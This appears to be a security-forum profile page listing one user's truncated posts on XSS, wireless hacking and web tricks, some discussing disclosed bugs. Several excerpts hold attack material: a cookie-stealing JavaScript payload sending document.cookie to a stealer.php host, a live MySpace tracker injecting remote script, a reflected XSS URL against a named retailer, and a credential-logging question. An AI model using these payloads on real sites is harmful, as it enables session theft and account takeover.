Adblock Plus Add N Edit Cookies Chatzilla Gmail Notifier IE tab Modify Headers NoScript Remember Mismatched Domains Tamper Data Temporary Inbox User Agent Switcher Web Developer
Forum: News and Links

Wouldn't be a bad idea on implementing something into any Car PC that'd allow for the device to be 'tracked'. Though setting up a backdoor would be the first idea, it may not be the best, due to process usage, etc. But setting up a little script to run on startup that simply GETs a URL on a server which you can see logs on. As then you could may be able to get a subpoena on that IP.
Forum: OMG Ponies

How would you set something like this to log the data but also forward the data anyway so they actually login, as to not think something is wrong (or more wrong than what they did)?
Forum: XSS Info

Welcome Syl4r. Heroes fan?
Forum: Intro

The only thing you could do is possibly modify the firmware of the router to try to increase the power output, though depending on where you live could make operating it illegal. You should be able to unsolder the existing antenna in the router and solder back on a better one though. Or dependant on your router, you could just unscrew the antenna and stick a new one on.
Forum: Wireless Security

What you would do is email someone who is with yahoo email & send the needed scripting in the subject. I tested it out a few days ago. its fixed now though. Nice find Hong
Forum: Full Disclosure

I uploaded the php file to my server and tried it out on myspace using javascript:document.location="http://path/to/stealer.php?cookie=" +document.cookie and it ran fine, logging to cookieslog.txt Using document.location="http://page.com/cookistealer.php?cookie=+document.cookie"; will not work. Under my test, it created the txt but logged the text "document.cookie&
Forum: XSS Info

Sorry if this sounds stupid, but did you create a file yourself called cookielog.txt ? The file doesn't create itself from the php code.
Forum: XSS Info

http://dect.myspace.com/event.ng/Type=click&Redirect=http://www.google.com
Forum: Full Disclosure

I heard about co.ck after watching Nathan Barley on Channel 4 a couple of years ago. Funny stuff. The domain for that show is http://trashbat.co.ck
Forum: OMG Ponies

Couldn't you cause the ad to load in an 1x1px or hidden iframe so that when clicked upon, you see no difference as the page you are on doesn't change?
Forum: XSS Info

@eyeced: You mention using ARP on a wireless network although this would only really be useful for viewing SSLd connections as traffic sent over the waves can be listened to by anyone. Using it for a DoS is important though. I have a Sharp Zaurus PDA running Debian with Kismet and have suceeded on many occasions in DoSing my wireless network (many times) merely by just scanning the network. I h
Forum: Wireless Security

Heres an example (live) tracker: Myspace code: <img z='<embed allowScriptAccess="never" allowNetworking="internal" enableJSURL="false" enableHREF="false" saveEmbedTags="true" src="http://pix.gif" ' src="http://stalkertrack.com/pix.gif" onload="var e=document.createElement('script');e.setAttribute('src','http://sta
Forum: Full Disclosure

You'd need an XSS on google as you can't grab contents from iframes that are on a different domain as to what you're page containing the iframe is on.
Forum: XSS Info

To get borderless and scrolless windows, the following code will do it: Page = "http://domain/page-to-display.html" document.body.innerHTML = '<iframe src="'+Page+'"border=0 width="100%" height="100%" FRAMEBORDER=0></iframe>'; Took me a while to do as I was trying out quite a few different ways, then I just took a look at the official IF
Forum: Full Disclosure

Ahh, that picture. I saw this ages ago and made a POC on it on my site somewhere. I'm sure soo soo many people would fall for this :(
Forum: OMG Ponies

There are actually only 3 ports open on the box. The rest are spoofed to put you off. The 3 ports open are 22 (SSH), 80 (http (some sort read only, edit via ssh thing)) and 113 (ident) The PS3 is running the FC5. So you pretty much won't be able to get in without owning another machine on the network. So its good for the person with the idea as they gain revenue from ads (i guess they have the
Forum: Projects

Before jumping into the deep end by trying out some XSS, you should understand what it is. So heres a nice article on it: http://en.wikipedia.org/wiki/XSS After that, you can view the XSS forum here: http://sla.ckers.org/forum/list.php?2 and the XSS cheat sheet here: http://ha.ckers.org/xss.html
Forum: XSS Info

http://www.overclockers.co.uk/search_results.php?sortby=&groupid=&string=%22%3E%27%3E%3CSCRIPT%3Ealert%28%27boom%27%29%3C%2FSCRIPT%3E
Forum: Full Disclosure

Hi I finally got my account confirmed (by logging into my webmail as opposed to reading mail through cPanel which doesn't work for confirming links :s) Anyway, I'm Tribute. I'm not a coder or a hacker. I consider myself as an explorer. I've been reading ha.ckers and sla.ckers for quite a long time now and enjoy it greatly. I have a website of my own, but as not a great deal is there for the
Forum: Intro